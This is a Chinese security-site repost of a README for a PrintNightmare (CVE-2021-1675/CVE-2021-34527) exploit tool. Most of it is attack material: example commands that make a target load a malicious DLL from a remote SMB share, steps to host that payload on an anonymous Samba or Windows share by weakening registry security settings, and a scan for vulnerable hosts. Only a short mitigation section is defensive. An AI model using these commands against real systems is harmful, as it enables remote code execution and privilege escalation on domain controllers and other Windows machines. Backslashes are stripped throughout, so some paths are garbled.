【安全工具】CVE-2021-1675 / CVE-2021-34527 - PrintNightmare Python、C#

admin
admin
admin
140488
文章
117
评论
2023年9月11日00:59:17评论38 views字数 2699阅读8分59秒阅读模式

点击上方蓝字“Ots安全”一起玩耍

CVE-2021-1675 / CVE-2021-34527 - PrintNightmare Python、C# 和 PowerShell 漏洞利用实现(LPE 和 RCE)


CVE-2021-1675 / CVE-2021-34527

最初由彭志娘 (@edwardzpeng) 和李雪峰 (@lxf02942370) 创建的PrintNightmare PoC 的Impacket 实现


在完全修补的 2019 域控制器上进行测试

远程或本地执行恶意DLL

【安全工具】CVE-2021-1675 / CVE-2021-34527 - PrintNightmare Python、C#

补丁更新

微软已经发布了一个补丁来缓解这些攻击,但如果机器上存在以下这些值,那么该机器仍然容易受到攻击

REG QUERY "HKLMSoftwarePoliciesMicrosoftWindows NTPrintersPointAndPrint"
HKEY_LOCAL_MACHINESoftwarePoliciesMicrosoftWindows NTPrintersPointAndPrintRestrictDriverInstallationToAdministrators    REG_DWORD    0x0NoWarningNoElevationOnInstall    REG_DWORD    0x1

安装

在运行漏洞利用之前,您需要安装我的 Impacket 版本,然后您就是 gucci

pip3 uninstall impacketgit clone https://github.com/cube0x0/impacketcd impacketpython3 ./setup.py install

CVE-2021-1675.py

usage: CVE-2021-1675.py [-h] [-hashes LMHASH:NTHASH] [-target-ip ip address] [-port [destination port]] target share
CVE-2021-1675 implementation.
positional arguments:  target                [[domain/]username[:password]@]<targetName or address>  share                 Path to DLL. Example '\10.10.10.10shareevil.dll'
optional arguments:  -h, --help            show this help message and exit
authentication:  -hashes LMHASH:NTHASH                        NTLM hashes, format is LMHASH:NTHASH
connection:  -target-ip ip address                        IP Address of the target machine. If omitted it will use whatever was specified as target. This is useful when target is the NetBIOS nameand you cannot resolve it  -port [destination port]                        Destination port to connect to SMB Server
Example;./CVE-2021-1675.py hackit.local/domain_user:[email protected] '\192.168.1.215smbaddCube.dll'./CVE-2021-1675.py hackit.local/domain_user:[email protected] 'C:addCube.dll'

中小企业配置

托管有效负载的最简单方法是使用 samba 并修改/etc/samba/smb.conf 以允许匿名访问

[global]map to guest = Bad Userserver role = standalone serverusershare allow guests = yesidmap config * : backend = tdbsmb ports = 445
[smb]comment = Sambapath = /tmp/guest ok = yesread only = nobrowsable = yes    force user = smbuser

从窗户也可以

mkdir C:shareicacls C:share /T /grant Anonymous` logon:ricacls C:share /T /grant Everyone:rNew-SmbShare -Path C:share -Name share -ReadAccess 'ANONYMOUS LOGON','Everyone'REG ADD "HKLMSystemCurrentControlSetServicesLanManServerParameters" /v NullSessionPipes /t REG_MULTI_SZ /d srvsvc /f #This will overwrite existing NullSessionPipesREG ADD "HKLMSystemCurrentControlSetServicesLanManServerParameters" /v NullSessionShares /t REG_MULTI_SZ /d share /fREG ADD "HKLMSystemCurrentControlSetControlLsa" /v EveryoneIncludesAnonymous /t REG_DWORD /d 1 /fREG ADD "HKLMSystemCurrentControlSetControlLsa" /v RestrictAnonymous /t REG_DWORD /d 0 /f# Reboot

扫描

我们可以使用rpcdump.pyfrom impacket 来扫描潜在的易受攻击的主机,如果它返回一个值,它可能是易受攻击的

rpcdump.py @192.168.1.10 | egrep 'MS-RPRN|MS-PAR'
Protocol: [MS-PAR]: Print System Asynchronous Remote Protocol Protocol: [MS-RPRN]: Print System Remote Protocol

减轻

禁用后台处理程序服务

Stop-Service SpoolerREG ADD  "HKLMSYSTEMCurrentControlSetServicesSpooler"  /v "Start" /t REG_DWORD /d "4" /f

【安全工具】CVE-2021-1675 / CVE-2021-34527 - PrintNightmare Python、C#

原文始发于微信公众号(Ots安全):【安全工具】CVE-2021-1675 / CVE-2021-34527 - PrintNightmare Python、C#

免责声明:文章中涉及的程序(方法)可能带有攻击性,仅供安全研究与教学之用,读者将其信息做其他用途,由读者承担全部法律及连带责任,本站不承担任何法律及连带责任;如有问题可邮件联系(建议使用企业邮箱或有效邮箱,避免邮件被拦截,联系方式见首页),望知悉。
  • 左青龙
  • 微信扫一扫
  • weinxin
  • 右白虎
  • 微信扫一扫
  • weinxin
admin
  • 本文由 发表于 2023年9月11日00:59:17
  • 转载请保留本文链接(CN-SEC中文网:感谢原作者辛苦付出):
                   【安全工具】CVE-2021-1675 / CVE-2021-34527 - PrintNightmare Python、C#https://cn-sec.com/archives/1105651.html
                  免责声明:文章中涉及的程序(方法)可能带有攻击性,仅供安全研究与教学之用,读者将其信息做其他用途,由读者承担全部法律及连带责任,本站不承担任何法律及连带责任;如有问题可邮件联系(建议使用企业邮箱或有效邮箱,避免邮件被拦截,联系方式见首页),望知悉.

发表评论

匿名网友 填写信息